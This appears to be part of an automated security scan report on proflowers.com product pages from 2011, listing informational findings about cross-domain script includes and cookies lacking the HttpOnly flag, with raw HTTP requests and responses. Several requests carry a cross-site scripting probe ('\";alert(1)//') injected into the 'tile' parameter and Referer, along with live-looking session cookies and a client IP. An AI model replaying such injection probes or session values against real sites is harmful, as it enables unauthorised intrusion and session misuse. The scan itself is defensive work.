<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

4.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

4.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

5.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

5.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
